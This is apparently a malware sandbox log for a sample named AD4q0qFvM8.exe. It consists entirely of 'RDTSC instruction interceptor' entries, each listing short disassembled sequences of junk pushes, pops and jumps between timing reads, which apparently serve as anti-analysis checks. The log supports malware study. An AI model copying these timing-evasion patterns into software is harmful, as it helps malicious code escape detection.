Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F36DF6 second address: F36E17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FDAC0B0C805h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F36E17 second address: F36E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37334 second address: F3733D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3733D second address: F37347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37347 second address: F37361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C806h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37361 second address: F37383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDAC110B28Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FDAC110B286h 0x00000014 ja 00007FDAC110B286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3E430 second address: F3E44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDAC0B0C807h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CD2D second address: F3CD41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDAC110B28Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFD3 second address: F3CFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFD7 second address: F3CFE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jo 00007FDAC110B286h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFE9 second address: F3D010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C802h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FDAC0B0C7F6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2BB second address: F3D2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2C1 second address: F3D2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDAC0B0C809h 0x0000000c jmp 00007FDAC0B0C802h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2F3 second address: F3D304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D304 second address: F3D30F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FDAC0B0C7F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D30F second address: F3D31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FDAC110B286h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D5C6 second address: F3D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDAC0B0C7FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D72F second address: F3D74C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425DF second address: F425E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425E8 second address: F425EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425EE second address: F425F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41ACF second address: F41AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AD3 second address: F41AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AE4 second address: F41AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jng 00007FDAC110B2A0h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AF4 second address: F41AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AFA second address: F41B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41D6F second address: F41D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F482AB second address: F482C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDAC110B286h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d jc 00007FDAC110B292h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F482C0 second address: F482C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F494D7 second address: F494E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F494E9 second address: F494FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FDAC0B0C7FCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F497AA second address: F497C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAC110B291h 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F4F7F9 second address: F4F829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDAC0B0C7F6h 0x0000000a jmp 00007FDAC0B0C7FCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDAC0B0C807h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F52BD3 second address: F52BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F52BD7 second address: F52BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F535FC second address: F53629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FDAC110B294h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBA8 second address: F5BBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBAF second address: F5BBB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBB5 second address: F5BBD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FDAC0B0C7FDh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBD2 second address: F5BBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBD8 second address: F5BBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBE1 second address: F5BBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBE7 second address: F5BBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A231 second address: F5A239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A239 second address: F5A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FDAC0B0C7F6h 0x0000000f jmp 00007FDAC0B0C800h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A258 second address: F5A25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A25C second address: F5A268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3A4 second address: F5A3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDAC110B294h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3C1 second address: F5A3ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAC0B0C808h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3ED second address: F5A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3F1 second address: F5A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 jmp 00007FDAC0B0C7FCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDAC0B0C7F6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A426 second address: F5A42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A42A second address: F5A443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDAC0B0C7FDh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A58A second address: F5A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A6EE second address: F5A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A6F6 second address: F5A715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FDAC110B296h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F599DC second address: F599E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F599E2 second address: F599E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F6426A second address: F6426E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F644DD second address: F644F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC110B286h 0x00000008 jc 00007FDAC110B286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F760E1 second address: F760E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F760E5 second address: F760E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75A8B second address: F75AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C805h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C18 second address: F75C35 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC110B286h 0x00000008 jmp 00007FDAC110B28Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FDAC110B286h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C35 second address: F75C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C3B second address: F75C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C41 second address: F75C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C47 second address: F75C61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAC110B286h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FDAC110B286h 0x00000014 jbe 00007FDAC110B286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F7CC85 second address: F7CC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC0B0C7FFh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D78D second address: E9D791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D791 second address: E9D79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D79D second address: E9D7A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAC110B28Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F82B45 second address: F82B9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FDAC0B0C7F6h 0x00000009 jmp 00007FDAC0B0C807h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 jo 00007FDAC0B0C7F6h 0x00000019 jmp 00007FDAC0B0C802h 0x0000001e pop ebx 0x0000001f jmp 00007FDAC0B0C800h 0x00000024 je 00007FDAC0B0C7FCh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F82B9B second address: F82BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902A6 second address: F902AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902AB second address: F902D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDAC110B292h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDAC110B290h 0x0000000f jbe 00007FDAC110B286h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902D7 second address: F902DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902DD second address: F90304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDAC110B297h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90460 second address: F90464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90464 second address: F90489 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDAC110B286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDAC110B292h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90489 second address: F9048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9048D second address: F90493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90493 second address: F9049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9049B second address: F9049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9049F second address: F904C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FDAC0B0C808h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908BC second address: F908CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDAC110B286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908CD second address: F908D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908D7 second address: F908DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90A7C second address: F90A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDAC0B0C7F6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90BD3 second address: F90C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FDAC110B296h 0x00000010 jmp 00007FDAC110B298h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90C19 second address: F90C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DA4 second address: F90DE1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC110B28Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FDAC110B286h 0x00000010 pushad 0x00000011 ja 00007FDAC110B286h 0x00000017 pushad 0x00000018 popad 0x00000019 jnc 00007FDAC110B286h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FDAC110B293h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DE1 second address: F90DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
